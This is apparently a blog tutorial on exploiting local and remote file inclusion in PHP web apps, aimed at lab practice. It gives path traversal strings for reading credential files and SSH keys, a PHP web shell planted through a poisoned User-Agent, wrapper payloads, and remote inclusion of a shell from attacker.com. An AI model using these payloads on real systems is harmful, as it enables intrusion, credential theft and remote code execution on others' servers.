Post 7: Local & Remote File Inclusion (LFI/RFI)

Reading, Poisoning, and Exploiting Server-Side Files

File inclusion vulnerabilities happen when a web application loads files based on user input — and doesn’t validate or sanitize that input properly. These bugs can let you:

  • Read sensitive files like /etc/passwd or wp-config.php
  • Access logs or backups
  • Trigger RCE through log poisoning or wrapper abuse
  • Include remote scripts (if RFI is enabled)
  1. What is LFI and RFI?
  2. How to Identify File Inclusion
  3. Testing for LFI
  4. Reading Sensitive Files
  5. Log Poisoning for RCE
  6. Wrappers and Advanced LFI
  7. Remote File Inclusion (RFI)
  8. Tools, Tips, and Practice

LFI (Local File Inclusion)
The app loads files from the local system based on user input.

Example:

http://target.com/index.php?page=about

If you can modify the page parameter to include other files on the server:

http://target.com/index.php?page=../../../../etc/passwd

RFI (Remote File Inclusion)
The app loads files from external URLs — allowing you to include malicious scripts:

http://target.com/index.php?page=http://attacker.com/shell.txt

Note: RFI is mostly deprecated on modern PHP installs due to hardened configs, but still seen in legacy apps or misconfigs.

Look for:

  • Parameters like page=, file=, lang=, template=
  • URLs that load content dynamically
  • Errors that mention “failed to open stream” or “include()” functions

Try:

page=about
page=../../../../etc/passwd
page=../../../../../../../../../../etc/passwd
../../../../etc/passwd
../../../../boot.ini

Use null byte in older systems (pre-PHP 5.3):

../../../../etc/passwd%00

Try with extensions:

?page=../../../../etc/passwd.txt
?page=../../../../etc/passwd%00.php

Common targets:

  • /etc/passwd — user accounts
  • /var/log/apache2/access.log — access logs for poisoning
  • /proc/self/environ — contains environment variables
  • wp-config.php — WordPress credentials
  • .ssh/id_rsa — SSH private keys

Try wrapping the request in Burp Suite and playing with traversal depth.

If you can write to logs (e.g., via your User-Agent or Referer), and then include the log file, you can trigger RCE.

Use curl or Burp to set a malicious User-Agent:

curl -A "<?php system($_GET['cmd']); ?>" http://target.com

Try:

?page=../../../../var/log/apache2/access.log
http://target.com?page=.../access.log&cmd=id

Allows you to base64-encode file output.

Example:

?page=php://filter/convert.base64-encode/resource=config.php

Decode the output to read files even if they have errors or unreadable characters.

Less commonly enabled, but can be abused to execute code in some rare cases:

?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=

(This is a base64-encoded PHP payload.)

If RFI is allowed (allow_url_include = On in php.ini), include a remote script.

<?php system($_GET['cmd']); ?>

Host it with:

php -S 0.0.0.0:8000
?page=http://your-ip:8000/shell.txt&cmd=whoami

If successful, you’ll get command output directly in the response.

  • Burp Suite – Ideal for testing and manipulating parameters
  • ffuf – Fuzz known file paths
  • wfuzz – Great for wrapper and traversal testing
  • Always test full traversal depth
  • Use log poisoning if direct RCE isn’t available
  • If you get errors but no output, try php://filter
  • Combine with file upload for post-upload LFI shell
  • TryHackMe: LFI room, Vulnversity
  • PortSwigger: File inclusion labs
  • DVWA and bWAPP: File inclusion modules
  • HackTheBox: Boxes with file inclusion, web, shell

Post 8: Session & Cookie Attacks
We’ll go into:

  • Session fixation
  • Cookie tampering
  • Token prediction
  • Hijacking and impersonation via insecure session handling

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top